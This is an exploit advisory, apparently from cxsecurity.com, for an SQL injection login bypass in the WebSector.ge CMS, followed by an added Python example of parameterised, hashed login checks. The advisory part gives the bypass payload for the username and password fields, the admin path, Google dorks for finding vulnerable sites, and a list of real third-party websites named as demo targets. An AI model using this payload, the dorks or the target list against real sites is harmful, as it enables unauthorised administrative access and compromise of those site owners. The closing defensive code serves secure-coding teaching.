WebSector.ge CMS SQL injection & Admin Page Bypass

2016.12.06
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|--------------------------------------------------------------|
|[+] Exploit Title: SQL injection & Admin Page Bypass
|[+]
|[+] Exploit Author : Azerbaycanli Hacker #By.SaMiR
|[+]
|[+] Vendor Homepage: http://websector.ge/
|[+]
|[+] Google Dork:intext:"websector.ge" inurl:php?id=
|[+] Google Dork:საიტი დამზადებულია WebSector.ge-ის მიერ
|[+]
|[+] Tested on: Windows 7
|[+]
|[+] Date: 06/12/2016
|[+]
|--------------------------------------------------------------|
|[+] Exploit :
|[+]
|[+] Username: '=' 'or'
|[+] Password: '=' 'or'
|[+]
|[+] Admin Url :-
|[+]
|[+] http://Site.ge/admin/
|[+]
|--------------------------------------------------------------|
|[+] Demo:-
|[+]
|[+]http://www.turugeorgia.com/index.php?page=tour_single&id=34
|[+]http://ertobaplus.ge/index.php?page=product&catid=35
|[+]http://orbita.ge/index.php?page=pages&id=6
|[+]http://www.vitamin.ge/index.php?page=projects_single&id=95
|[+]http://www.hauck-georgien.com/index.php?page=products&cat=4
|--------------------------------------------------------------|
|[+] Thanks: CXSECURITY.COM Team's Members
|[+] Azerbaijan is a strong state and it has a strong army!
|[+] Url : http://pagebin.com/G2V7JVOW
|[+]
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
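
The advisory does not show the CMS source, so the following is an added example, not WebSector.ge code or the advisory author's: it contrasts a login query built by string concatenation (an assumed weak pattern) with a bound-parameter login that treats the advisory's Username/Password strings as plain data. The `admins` table, the credentials and all function names are constructed for illustration, using Python with an in-memory SQLite database.

```python
import hashlib
import hmac
import os
import sqlite3

# The login string printed in the advisory, used here only as test input.
ADVISORY_INPUT = "'=' 'or'"

def pw_hash(password: str, salt: bytes) -> bytes:
    """Salted PBKDF2 digest; the stored form of a password."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)

def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the CMS admin table (schema is assumed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admins (username TEXT PRIMARY KEY, salt BLOB, digest BLOB)")
    salt = os.urandom(16)
    conn.execute("INSERT INTO admins VALUES (?, ?, ?)",
                 ("admin", salt, pw_hash("constructed-password", salt)))
    return conn

def concat_query(username: str, password: str) -> str:
    """Weak pattern (assumed): form fields pasted into the SQL text.
    Quotes in the input close the string literal, so the database parses
    the remainder (= and or) as operators instead of data."""
    return ("SELECT 1 FROM admins WHERE username='%s' AND password='%s'"
            % (username, password))

def login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Hardened pattern: the username is a bound parameter, and the password
    never enters SQL; its digest is compared in constant time."""
    row = conn.execute("SELECT salt, digest FROM admins WHERE username = ?",
                       (username,)).fetchone()
    if row is None:
        pw_hash(password, b"\x00" * 16)  # keep timing similar for unknown users
        return False
    salt, digest = row
    return hmac.compare_digest(pw_hash(password, salt), digest)

if __name__ == "__main__":
    db = make_db()
    print(concat_query(ADVISORY_INPUT, ADVISORY_INPUT))   # literal boundaries broken
    print(login(db, ADVISORY_INPUT, ADVISORY_INPUT))      # bound as plain text
    print(login(db, "admin", "constructed-password"))     # legitimate login
```

The same binding rule applies to the numeric `id`, `catid` and `cat` parameters of `index.php`: pass them as bound parameters after checking they are integers.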


Copyright 2024, cxsecurity.com